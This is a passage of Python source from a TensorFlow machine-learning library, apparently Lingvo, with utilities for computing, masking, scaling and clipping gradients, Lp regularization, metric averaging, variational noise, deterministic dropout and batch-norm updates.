compute_gradients_fn=None,
skip_zero_gradients=None,
use_bf16_gradients_ar=False,
skip_none_gradients=True,
defer_crs_to_apply_grad=False,
activations_grad=None,
is_activations=False,
tpu_embedding_activations=None):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss_or_activations: either the loss, which is a scalar tensor, or
activations, which could be a tensor or a list of tensors.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
operations. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
sparsely activated networks or switchable layers in neural architectural
search. Only applicable on TPU.
Possible values are:
- None: do not skip zero gradients;
- `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
- `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
use_bf16_gradients_ar: Whether to use bfloat16 dtype for gradients
all-reduce. This applies to TPU only.
skip_none_gradients: Whether to skip gradients that are None.
defer_crs_to_apply_grad: Whether to defer gradient cross replica sum to
apply_gradient. This applies to TPU only.
activations_grad: The gradients computed for activations.
is_activations: A boolean, whether the input is loss or activations.
tpu_embedding_activations: A `.NestedMap` of tpu embedding feature name ->
embedding feature tensor.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
If tpu_embedding_activations is set, a sub `.NestedMap` named
tpu_embedding_var_grads will be used to store the VarGrads for the
activations. In this case, key is the feature name, and var in the VarGrad
is the activation tensor (not a real variable).
"""
if not is_activations:
loss_or_activations = HasRank(loss_or_activations, 0)
if not tpu_embedding_activations:
tpu_embedding_activations = NestedMap()
assert isinstance(tpu_embedding_activations, NestedMap)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss_or_activations'.
# This doesn't work if the training loop is wrapped inside a tf.function,
# since all variables will be lifted out and trainable_variables will be
# empty. In that case we skip the check.
trainable_variables = set([v.ref() for v in tf.trainable_variables()])
if trainable_variables:
def Needed(v):
if isinstance(v, tf.Variable):
if v.ref() not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
assert not tpu_embedding_activations
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu,
skip_zero_gradients=skip_zero_gradients,
use_bf16_gradients_ar=use_bf16_gradients_ar,
defer_crs_to_apply_grad=defer_crs_to_apply_grad,
activations_grad=activations_grad,
is_activations=is_activations,
tpu_embedding_activations=tpu_embedding_activations.Flatten())
else:
assert not tpu_embedding_activations
take_grad = ComputeGradientsSimple
grads = take_grad(loss_or_activations, filtered_vlist,
grad_aggregation_method, colocate_gradients_with_ops,
gate_gradients)
if tpu_embedding_activations:
tpu_embedding_grads = grads[len(filtered_vlist):]
grads = grads[:len(filtered_vlist)]
else:
tpu_embedding_grads = None
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
if skip_none_gradients:
var_grads = SkipNoneGradients(var_grads)
if tpu_embedding_grads:
# Create VarGrads for TPU embedding activations in a dedicated sub map.
assert 'tpu_embedding_var_grads' not in var_grads
tpu_embedding_activation_list = tpu_embedding_activations.Flatten()
tpu_embedding_var_grads = [
VarGrad(v, g)
for v, g in zip(tpu_embedding_activation_list, tpu_embedding_grads)
]
tpu_embedding_var_grads = tpu_embedding_activations.Pack(
tpu_embedding_var_grads)
# Replace None gradients with zeros, since TPU embedding expect all
# activations to have gradients.
def _NoneToZeros(key, var_grad):
if var_grad.grad is None:
tf.logging.warning(
f'TPU embedding gradient for feature {key} is None. Replacing with '
'zeros.')
return VarGrad(var_grad.var, tf.zeros_like(var_grad.var))
return var_grad
var_grads.tpu_embedding_var_grads = (
tpu_embedding_var_grads.TransformWithKey(_NoneToZeros))
return var_grads
def MaskGradients(var_grad, grad_mask):
  """Computes gradients of non-masked variables in vmap w.r.t loss.

  Args:
    var_grad: A `.NestedMap` of (variable, gradient).
    grad_mask: A dict of (variable name, mask).

  Returns:
    var_grad - a `.NestedMap` of (variable, mask * gradient).
  """

  def _MaskOne(item):
    """Multiplies one entry's gradient by its per-variable mask."""
    v, g = item
    m = grad_mask[v.name]
    if isinstance(g, tf.IndexedSlices):
      return VarGrad(v, tf.IndexedSlices(g.values * m, g.indices))
    return VarGrad(v, g * m)

  return var_grad.Transform(_MaskOne)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
  """Scale gradients by grad_scale on same device as corresponding variables.

  Args:
    vs_gs: A `.NestedMap` of VarGrad.
    grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
      applies to every entry.

  Returns:
    A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
    grad_scale is 0, the result gradient is always 0, even if the input
    gradient is inf or nan.
  """

  def _ZeroOrScale(v: tf.Tensor, g: tf.Tensor, s: tf.Tensor) -> tf.Tensor:
    # Fail fast on non-finite gradients before scaling.
    g = CheckNumerics(g, 'Gradient for %s is not finite.' % v.name)
    # tf.where yields an exact zero when the scale is zero, even if the
    # incoming gradient is inf or nan.
    return tf.where(
        tf.equal(s, 0.), tf.zeros_like(g),
        tf.cast(s, g.dtype) * g)

  def _ScaleEntry(entry: VarGrad) -> VarGrad:
    """Scales one (var, grad) entry on the variable's device."""
    v, g = entry
    assert g is not None, ('No grad found for ', v.name)
    s = entry.scale if grad_scale is None else grad_scale
    with tf.device(v.device):
      if isinstance(g, tf.IndexedSlices):
        g = tf.IndexedSlices(
            _ZeroOrScale(v, g.values, s), g.indices, g.dense_shape)
      else:
        g = _ZeroOrScale(v, g, s)
    return VarGrad(v, g)

  return vs_gs.Transform(_ScaleEntry)
def HasNanOrInf(x):
  """Returns a scalar bool tensor: True iff `x` contains a NaN or Inf."""
  if isinstance(x, tf.IndexedSlices):
    x = x.values
  with tf.device(x.device):
    if x.dtype.is_complex:
      # Check the real and imaginary components independently.
      real_bad = HasNanOrInf(tf.math.real(x))
      imag_bad = HasNanOrInf(tf.math.imag(x))
      return tf.reduce_any([real_bad, imag_bad])
    bad = tf.math.logical_or(tf.math.is_nan(x), tf.math.is_inf(x))
    return tf.reduce_any(bad)
def HasNanOrInfGradient(var_grads):
  """Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.

  Args:
    var_grads: A `.NestedMap` with (var, grad) tuple as the map value.

  Returns:
    A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
  """
  grads = [g for _, g in var_grads.Flatten()]
  return tf.reduce_any([HasNanOrInf(g) for g in grads])
def ApplyGradNormClipping(vs_gs, norm=1.0):
  """Clip gradients to norm on same device as corresponding variables.

  Args:
    vs_gs: A `.NestedMap` of VarGrad.
    norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
      value of `norm`.

  Returns:
    A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
    grad_scale is 0, the result gradient is always 0, even if the input
    gradient is inf or nan.
  """

  def _ClipOne(v, g, max_norm):
    # Fail fast on non-finite gradients before clipping.
    g = CheckNumerics(g, 'Gradient for %s is not finite.' % v.name)
    return tf.clip_by_norm(g, max_norm)

  def _ClipEntry(entry):
    """Clips one (var, grad) entry on the variable's device."""
    v, g = entry
    assert g is not None, ('No grad found for ', v.name)
    with tf.device(v.device):
      if isinstance(g, tf.IndexedSlices):
        g = tf.IndexedSlices(
            _ClipOne(v, g.values, norm), g.indices, g.dense_shape)
      else:
        g = _ClipOne(v, g, norm)
    return VarGrad(v, g)

  return vs_gs.Transform(_ClipEntry)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
  """Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.

  Args:
    var_grads: a `.NestedMap` or list of (variable, gradient).
    lp_regularizer_weight: Lp regularization weight.
    p: For now we support 1.0 or 2.0.

  Returns:
    A tuple (lp_loss, var_grads).

    - lp_loss: A scalar. The lp loss.
    - var_grads: a `.NestedMap` or list of (variable, gradient) regulated by
      Lp.
  """
  # TODO(yuancao): For now we support p=1 or 2, but this can be extended to
  # lp-norm in general.
  assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
  def GetVar(item):
    # For sparse (IndexedSlices) gradients, only the rows actually touched by
    # this step contribute to the loss; gather the unique ones.
    var, grad = item
    if isinstance(grad, tf.IndexedSlices):
      with tf.device(var.device):
        ids = HasRank(grad.indices, 1)
        uniq_ids = tf.unique(ids).y
        return tf.gather(var, uniq_ids)
    else:
      return var
  def ShouldAdjust(v):
    # Variables registered in SKIP_LP_REGULARIZATION are left untouched.
    return not _VarInCollection(v, tf.get_collection(SKIP_LP_REGULARIZATION))
  filtered_var_grads = [
      var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
  ]
  filtered_vars = Transform(GetVar, filtered_var_grads)
  for v in filtered_vars:
    # Tensor .name is unavailable in eager mode.
    v_name = v.name if not tf.executing_eagerly() else '[eager]'
    tf.logging.info('AdjustGradientsWithLpLoss: %s', v_name)
  # Exactly one branch assigns lp_loss; p was validated by the assert above.
  if p == 2.0:
    lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
  elif p == 1.0:
    lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
  def LpGrad(var_grad):
    """Adjusts item's grad w/ Lp loss term."""
    var, grad = var_grad
    if isinstance(grad, tf.IndexedSlices):
      # Question(rpang): do we apply Lp loss here even if 'var' is in
      # SKIP_LP_REGULARIZATION?
      #
      # Note: IndexedSlces appears for embedding lookups.
      # Embedding lookup ids can have duplicate. For duplicated ids, we
      # only want to consider once for each ids.
      with tf.device(var.device):
        emb = HasRank(var, 2)
        vocab_size = tf.shape(emb)[0]
        ids = HasRank(grad.indices, 1)
        values = tf.gather(emb, ids)  # [#ids, dims]
      with tf.device(grad.device):
        # Counts is a vector of size vocab_size. counts[i] is i-th words
        # occurrences in 'ids'.
        counts = tf.math.unsorted_segment_sum(
            tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
        # Gradients for duplicated ids will be summed when they get
        # applied, and hence we account for that by first dividing
        # gradient resulting from lp loss by how many times the id is
        # duplicated.
        #
        # For each id in 'ids', we know counts[id] is non-zero,
        # hence, it's always safe to take reciprocal.
        weights = tf.math.reciprocal(tf.gather(counts, ids))
        weights = tf.expand_dims(weights, -1)  # [#ids, 1]
        if p == 2.0:
          grad_v = values
        elif p == 1.0:
          grad_v = tf.sign(values)
        delta = lp_regularizer_weight * weights * grad_v
        # NOTE(review): the rebuilt IndexedSlices drops grad.dense_shape —
        # confirm downstream consumers do not rely on it.
        grad = tf.IndexedSlices(grad.values + delta, ids)
    elif not _VarInCollection(var, tf.get_collection(SKIP_LP_REGULARIZATION)):
      with tf.device(var.device):
        if p == 2.0:
          grad_v = var
        elif p == 1.0:
          grad_v = tf.sign(var)
        delta = lp_regularizer_weight * grad_v
      with tf.device(grad.device):
        grad += delta
    return VarGrad(var, grad)
  return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
  """Splits Tensors in 'x' recursively.

  Args:
    x: a Tensor, or a list or NestMap containing Tensors to split.
    num_splits: number of splits per Tensor.
    axis: the split axis.

  Returns:
    A list of split values of length 'num_splits'.

    - If 'x' is a Tensor, a list of split Tensors.
    - If 'x' is a list, a list of lists, where each sublist has the same length
      as 'x' and the k'th element in each sublist corresponds to a split of the
      k'th element from 'x'.
    - If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
      corresponds to a split from the same field of 'x'.
  """
  if isinstance(x, tf.Tensor):
    return tf.split(x, num_splits, axis=axis)
  if isinstance(x, list):
    # Split each element, then transpose: element-major -> split-major.
    per_element = [SplitRecursively(e, num_splits, axis) for e in x]
    return [list(group) for group in zip(*per_element)]
  if isinstance(x, NestedMap):
    out = [NestedMap() for _ in range(num_splits)]
    for field, value in x.items():
      for i, piece in enumerate(SplitRecursively(value, num_splits, axis)):
        out[i][field] = piece
    return out
  raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
  """Concatenates tensors from 'splits'.

  This is the inverse function of SplitRecursively.

  Args:
    splits: a list of splits to concatenate, where elements can be Tensors,
      lists, or `.NestedMap`. The elements must share the same type and
      structure. For example, list elements must have the same length;
      `.NestedMap` must have the same set of fields.
    axis: the concatenation axis.

  Returns:
    Concatenated data.

    - If input 'splits' are Tensors, returns a concatenated Tensor.
    - If input 'splits' are lists, returns a list of the same length where the
      k'th element represents concatenated data of the k'th element from each
      split.
    - If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each
      field concatenated from corresponding fields of input splits.

  Raises:
    TypeError: if 'splits' is not a list or elements of 'splits' do not have
      known or matching types.
    ValueError: if 'splits' is empty or elements of 'splits' do not have
      matching structures.
  """
  if not isinstance(splits, list):
    raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
  if not splits:
    raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
  first = splits[0]
  if isinstance(first, tf.Tensor):
    return tf.concat(splits, axis=axis)
  if isinstance(first, list):
    if any(not isinstance(split, list) for split in splits):
      raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
    if any(len(split) != len(first) for split in splits):
      raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
    return [
        ConcatRecursively([split[i] for split in splits], axis)
        for i in range(len(first))
    ]
  if isinstance(first, NestedMap):
    if any(not isinstance(split, NestedMap) for split in splits):
      raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
    out = NestedMap()
    for field in first:
      out[field] = ConcatRecursively([split[field] for split in splits], axis)
    return out
  raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
  """Computes weighted average of values from a tensor.

  Args:
    values: a tensor of values
    weights: a tensor of weights
    sum_reduction_fn: called to reduce the values and weights to single value
    name: name of metric.

  Returns:
    A tuple (avg, total_weight).

    - avg: weighted average value
    - total_weight: sum of all weights
  """
  msg = 'shape of values and weights tensors must match for metric ' + name
  values = with_dependencies(
      [assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
  total_weight = sum_reduction_fn(weights)
  # divide_no_nan only supports tf.{float,complex}*; compute in float64 only
  # when the values are already float64, otherwise in float32.
  compute_dtype = values.dtype if values.dtype is tf.float64 else tf.float32
  weighted_sum = sum_reduction_fn(
      tf.cast(values, compute_dtype) * tf.cast(weights, compute_dtype))
  avg = tf.math.divide_no_nan(weighted_sum,
                              tf.cast(total_weight, compute_dtype))
  return tf.cast(avg, values.dtype), total_weight
def WeightedAvgOfMetrics(metrics):
  """Computes the weighted average of metrics in the list.

  Args:
    metrics: list of dictionaries of metrics, each mapping a metric name to a
      (value, weight) pair.

  Returns:
    ret_dict - dictionary of weighted averages of each metrics.
  """
  ret_dict = {}
  # Group (value, weight) pairs by metric name across all input dicts.
  # setdefault replaces the check-then-append membership pattern.
  lists_of_metrics = {}
  for m in metrics:
    for name, (value, weight) in m.items():
      lists_of_metrics.setdefault(name, []).append((value, weight))
  # Iterate in sorted name order so the resulting graph/dict is deterministic.
  for name, values_and_weights in sorted(lists_of_metrics.items()):
    values = tf.stack([x[0] for x in values_and_weights])
    weights = tf.stack([x[1] for x in values_and_weights])
    ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
  return ret_dict
def ConcatPerExampleTensors(per_example):
  """Concatenate per-example tensors from many hosts into one large block.

  Args:
    per_example: list of dictionaries of per-example tensors.

  Returns:
    ret_dict - string -> concatenated tensors.
  """
  # Group tensors by name across all input dicts; setdefault replaces the
  # check-then-append membership pattern.
  lists_of_per_example = {}
  for m in per_example:
    for name, value in m.items():
      lists_of_per_example.setdefault(name, []).append(value)
  # Iterate in sorted name order for deterministic output, concatenating each
  # group along the leading (example) axis.
  ret_dict = {}
  for name, values in sorted(lists_of_per_example.items()):
    ret_dict[name] = tf.concat(values, 0)
  return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
  """Combines metrics from `loss_metric_weight_pairs` according to weights.

  Keys must either exist in all metrics, in which it will be processed as a
  weighted sum, or exist in only one metrics, in which case it will be copied.

  Args:
    loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
      weight is a float and each metrics is a dict with str keys and
      (metric_value, target_weight) values.

  Returns:
    A dict with the same set of keys as input metrics and values of
    (weighted_sum(metric_value), weighted_sum(target_weight)).

  Raises:
    ValueError: if there exists a metric that exists in more than one element
      of `loss_metric_weight_pairs` but not in all of them.
  """
  all_keys = set(
      [k for loss_metrics, _ in loss_metric_weight_pairs for k in loss_metrics])  # pylint: disable=g-complex-comprehension
  result = {}
  for k in all_keys:
    # Count how many of the metric dicts define this key.
    count = sum(
        1 for loss_metrics, _ in loss_metric_weight_pairs if k in loss_metrics)
    if count > 1 and count != len(loss_metric_weight_pairs):
      # Bug fix: the original message lacked a space between 'one' and 'but'.
      raise ValueError('Found metric %s which exists in more than one '
                       'but not all loss metrics.' % k)
    total_val = 0
    total_target_weight = 0
    for loss_metrics, weight in loss_metric_weight_pairs:
      if k in loss_metrics:
        val, target_weight = loss_metrics[k]
        if count == 1:
          # Single metric: copy through without the combination weight.
          total_val = val * target_weight
          total_target_weight = target_weight
        else:
          # Total weighted sum of all predictions.
          total_val += weight * val * target_weight
          total_target_weight += weight * target_weight
    result[k] = (total_val / total_target_weight, total_target_weight)
  return result
def AddVN(p, x, per_step=False):
  """Add variational noise to x.

  Args:
    p: Layer params, with a `vn` subparam containing `VariationalNoiseParams`.
    x: Input to add variational noise to.
    per_step: Whether to add per_step noise.

  Returns:
    The input with variational noise added according to params, or `x`
    unchanged when the requested noise kind is disabled in `p.vn`.

  Raises:
    ValueError: if `p.vn.scale` is unset, or per-step noise is requested with
      `deterministic=False`.
  """
  # Tensor .name is unavailable in eager mode.
  tensor_name = x.name if not tf.executing_eagerly() else '[eager]'
  if per_step:
    if not p.vn.per_step_vn:
      tf.logging.info(
          'p.vn.per_step_vn is not set. Not adding per-step vn to ' +
          tensor_name)
      return x
  else:
    if not p.vn.global_vn:
      tf.logging.info('p.vn.global_vn is not set. Not adding global vn to ' +
                      tensor_name)
      return x
  tf.logging.info(
      f"Add {'per-step' if per_step else 'global'} vn to {tensor_name}: {p.vn}")
  if p.vn.scale is None:
    raise ValueError('VN scale must be set.')
  if p.vn.deterministic:
    # Stateless (seed-driven) noise; safe inside functional/recurrent loops.
    noises = DeterministicVN(p, tf.shape(x), mean=0.0, std=1.0)
    noises = tf.cast(noises, x.dtype)
  else:
    if per_step:
      # recurrent.py does not support stateful random ops in cell_fn due to
      # rematerialization.
      raise ValueError('per_step vn requires deterministic=True.')
    noises = tf.random.normal(
        tf.shape(x), stddev=1.0, seed=p.vn.seed, dtype=x.dtype)
  # Gate the noise off (scale 0) until the global step reaches start_step.
  scale = tf.where(GetGlobalStep() >= p.vn.start_step, p.vn.scale, 0.0)
  return x + tf.cast(scale, x.dtype) * noises
def VariationalNoiseParams(scale,
                           global_vn=False,
                           per_step_vn=False,
                           seed=None,
                           deterministic=None,
                           start_step=0):
  """Returns a hyperparams for variational noise.

  Args:
    scale: Std of the variational noise; a scalar or a scalar tensor.
    global_vn: Whether to add global variational noise during training.
    per_step_vn: Whether to add per-timestep variational noise.
    seed: Random seed used to generate the noise.
    deterministic: If true, generate noise with stateless random ops. When
      None, defaults to True inside unit tests.
    start_step: Step starting from which variational noise is added.

  Returns:
    A `hyperparams.Params` describing the variational noise configuration.
  """
  if deterministic is None:
    # Default to stateless (deterministic) noise inside unit tests only.
    deterministic = cluster_factory.Current().in_unit_test
  p = hyperparams.Params()
  # Help-string fixes: 'apply .' -> 'apply.', 'setp' -> 'step',
  # 'timesetp' -> 'timestep', and a missing space that rendered as
  # 'usingstateless'.
  p.Define(
      'scale', scale,
      'Std of the variational noise to apply. This can be a scalar,'
      ' or a scalar tensor.')
  p.Define('global_vn', global_vn,
           'Adds global variational noise every training step iff True.')
  p.Define('per_step_vn', per_step_vn,
           'Adds per-timestep variational noise iff True.')
  p.Define('seed', seed, 'Random seed used to generate noise.')
  p.Define(
      'deterministic', deterministic, 'If true, generate noise using '
      'stateless random ops that are compatible with TF functional ops.')
  p.Define(
      'start_step', start_step,
      'Step starting from which variational noise is added during training.')
  return p
def DefaultVN():
  """Returns the default variational-noise params (scale=None, disabled)."""
  return VariationalNoiseParams(scale=None)
# To disable VN of a layer, we use 1.0 as the first input parameter of the
# following function because otherwise it would equal DefaultVN(), which is
# overwritten by the parent configuration in CopyBaseParams().
def DisableVN():
  """Returns variational-noise params that explicitly disable VN."""
  return VariationalNoiseParams(1.0, False, False)
# Step seed keyed by graph (the dict key is id(tf.get_default_graph())),
# stored per-thread so concurrent threads do not share seed state.
_STEP_SEED_DICT = ThreadLocalDict()
# The step seed will increment by np.prod(_STEP_SEED_INCREMENT.stack)
# on each GetIncStepSeed() call.
_STEP_SEED_INCREMENT = ThreadLocalStack()
@contextlib.contextmanager
def StepSeedIncrementContext(step):
  """Adds an element to _STEP_SEED_INCREMENT.

  While active, GetIncStepSeed() advances the step seed by the product of the
  whole increment stack (including `step`).

  Args:
    step: a positive increment factor for the step seed.

  Yields:
    None. The previous increment stack is restored on exit.

  Raises:
    ValueError: if `step` is not positive.
  """
  if step <= 0:
    # Explicit validation instead of `assert`, which is stripped under -O.
    raise ValueError('step must be positive: %s' % step)
  _STEP_SEED_INCREMENT.stack.append(step)
  try:
    yield
  finally:
    _STEP_SEED_INCREMENT.stack.pop()
def GetStepSeed():
  """Gets step_seed."""
  graph_key = id(tf.get_default_graph())
  # Lazily initialize the seed for graphs we have not seen yet.
  if graph_key not in _STEP_SEED_DICT.dict:
    ResetStepSeed()
  return _STEP_SEED_DICT.dict[graph_key]
def ResetStepSeed(seed=0):
  """Resets step_seed to specified value."""
  graph_key = id(tf.get_default_graph())
  seed_tensor = tf.convert_to_tensor(seed, dtype=tf.int64)
  _STEP_SEED_DICT.dict[graph_key] = seed_tensor
def MaybeResetStepSeedFromScope():
  """In graph mode, resets step_seed according to the current named scope.

  This is used in graph mode to avoid "tensor is from a different graph"
  errors that happen when we share random seed tensors too much.
  See b/129159299 for more context.

  Eager mode does not have this problem, so in eager mode we do nothing.
  """
  if tf.executing_eagerly():
    return
  # The no-op's fully-qualified name encodes the current name scope.
  scope_name = tf.no_op(name='new_step_seed').name
  ResetStepSeed(GenerateSeedFromName(scope_name))
def MaybeResetStepSeed(seed):
  """If we're in graph mode, reset the step seed."""
  if tf.executing_eagerly():
    return
  ResetStepSeed(seed)
def GetIncStepSeed():
  """Returns and increments the step_seed."""
  current_seed = GetStepSeed()
  # TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
  # independent of underlying PRNG used by tensorflow.
  increment = np.prod(_STEP_SEED_INCREMENT.stack)
  ResetStepSeed(current_seed + increment)
  return current_seed
def GenerateStepSeedPair(p, op_seed=None):
  """Generates a seed pair for deterministic random operations in
  functional loops.

  This function retrieves a unique seed pair on each call, based off the
  current global step and step seed. The step seed ensures this function
  returns a unique seed pair on each call: calling this function automatically
  increments the step seed. The step seed is automatically reset at the
  beginning of each global step in the model's FProp and works transparently
  through recurrent.py.

  Args:
    p: A hyperparams.Params object, containing keys 'random_seed' and
      'is_inference'.
    op_seed: An additional operation-level seed to apply.

  Returns:
    A size 2 tensor of op seeds to use for stateless_random ops.
  """
  # TPU stateless ops take int32 seeds; elsewhere int64 is used.
  seed_dtype = tf.int32 if use_tpu() else tf.int64
  if p.is_inference and p.random_seed is None:
    # Ensure GetIncStepSeed is called even inside the shortcut.
    # This ensures if p.random_seed is set for other ops that use this function
    # that they will get the same seed pair whether or not p.random_seed is set
    # for this specific call.
    GetIncStepSeed()
    # Unlike tf.random*, stateless random ops are completely determined by the
    # passed-in seeds. This means at inference time the same inputs will
    # produce the same outputs, even if the model is supposed to have
    # randomness such as dropout during inference. We inject additional
    # randomness only during inference if the graph is exported with
    # random_seed=None as a workaround.
    return tf.random.uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
  global_step = tf.cast(GetGlobalStep(), seed_dtype)
  step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
  seeds = tf.stack([global_step, step_seed])
  # Optional offsets: a model-level seed and an op-level seed shift the pair.
  if p.random_seed is not None:
    seeds += p.random_seed
  if op_seed is not None:
    op_seed = tf.cast(op_seed, seed_dtype)
    seeds += op_seed
  return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
  """Similar to `tf.nn.dropout()`, but fully deterministic.

  Args:
    x: A float Tensor on which to apply dropout.
    keep_prob: A scalar `Tensor` of keep probability.
    seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
      generator.
    noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
      randomly generated keep/drop flags.
    name: An optional name for this operation.

  Returns:
    A Tensor with the same shape as `x`.

  Raises:
    InvalidArgumentError: if keep_prob is invalid.
  """
  if isinstance(keep_prob, numbers.Real):
    if keep_prob <= 0 or keep_prob > 1:
      # NOTE(review): tf.errors.InvalidArgumentError conventionally takes
      # (node_def, op, message); confirm this single-argument form actually
      # constructs/raises as intended with the tf wrapper in use.
      raise tf.errors.InvalidArgumentError(
          'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
    if keep_prob == 1:
      # No-op fast path: nothing is dropped.
      return x
  with tf.name_scope(name, 'dropout', [x]) as name:
    if use_tpu():
      seeds = tf.cast(seeds, tf.int32)
    keep_prob = tf.convert_to_tensor(
        keep_prob, dtype=tf.float32, name='keep_prob')
    # uniform in [keep_prob, 1.0 + keep_prob)
    # StatelessRandomUniform op does not support non-float (e.g. bfloat16)
    # dtype and non-int32 seed types.
    noise_shape = noise_shape or GetShape(x)
    random_tensor = keep_prob + tf.random.stateless_uniform(
        noise_shape, seed=seeds, dtype=tf.float32)
    # 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
    binary_tensor = tf.floor(random_tensor)
    if x.dtype != tf.float32:
      binary_tensor = tf.cast(binary_tensor, x.dtype)
      keep_prob = tf.cast(keep_prob, dtype=x.dtype)
    # Scale the kept values by 1/keep_prob so the expectation is unchanged.
    # NOTE(review): tf.div is deprecated in TF2 in favor of tf.math.divide —
    # verify against the tf compat wrapper in use.
    result = tf.div(x, keep_prob) * binary_tensor
    result.set_shape(x.get_shape())
    return result
def DeterministicVN(params, noise_shape, mean=0.0, std=1.0, name=None):
  """Produces Fully deterministic Gaussian noise from shape, mean and std.

  Args:
    params: Nested map of params.
    noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
      randomly generated Gaussian noise.
    mean: Mean for the Gaussian noise.
    std: Standard deviation for noise.
    name: An optional name for this operation.

  Returns:
    A Tensor with the shape noise_shape and type fprop_dtype.
  """
  with tf.name_scope(name, 'gaussian_noise') as name:
    # Stateless normal draws keyed off the (global step, step seed) pair.
    seeds = GenerateStepSeedPair(params, params.vn.seed)
    noise = std * tf.random.stateless_normal(noise_shape, seed=seeds)
    noise = mean + noise
    fprop_dtype = FPropDtype(params)
    if fprop_dtype != tf.float32:
      noise = tf.cast(noise, fprop_dtype)
    return noise
# Graph collection holding the batch-norm moving-average update ops.
BATCH_NORM_UPDATES = 'batch_norm_updates'
# Lingvo-internal collection mapping a BN update op name to the
# (moving-average variable, batch statistics) pair it was created from;
# consumed by FindRelevantBatchNormUpdates below.
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
                                                 lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
  """Update batch normalization moving averages.

  Computes `var -= (1 - decay) * (var - stats)` (an exponential moving
  average step), skipping the update entirely when the delta contains
  NaN/Inf, and registers the update op in the BATCH_NORM_UPDATES collection.

  Args:
    batch_norm_var: the moving-average variable to update.
    batch_norm_stats: the batch statistics tensor to move towards.
    decay: the moving-average decay factor.

  Returns:
    The assign_sub op that applies the update.
  """
  with tf.name_scope(
      'AssignMovingAvg', values=[
          batch_norm_var,
          batch_norm_stats,
          decay,
      ]) as scope:
    with tf.ops.colocate_with(batch_norm_var):
      # Convert the EMA step size (1 - decay) on the variable's device/dtype.
      decay = tf.convert_to_tensor(
          1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
      update_delta = (batch_norm_var - tf.cast(
          batch_norm_stats, batch_norm_var.dtype.base_dtype)) * decay
      # If the batch stats produced any NaN/Inf, zero the delta so the
      # moving average is left unchanged rather than poisoned.
      has_nan_or_inf = tf.reduce_any(
          tf.math.logical_or(
              tf.math.is_nan(update_delta), tf.math.is_inf(update_delta)))
      update_delta = tf.where(has_nan_or_inf, tf.zeros_like(update_delta),
                              update_delta)
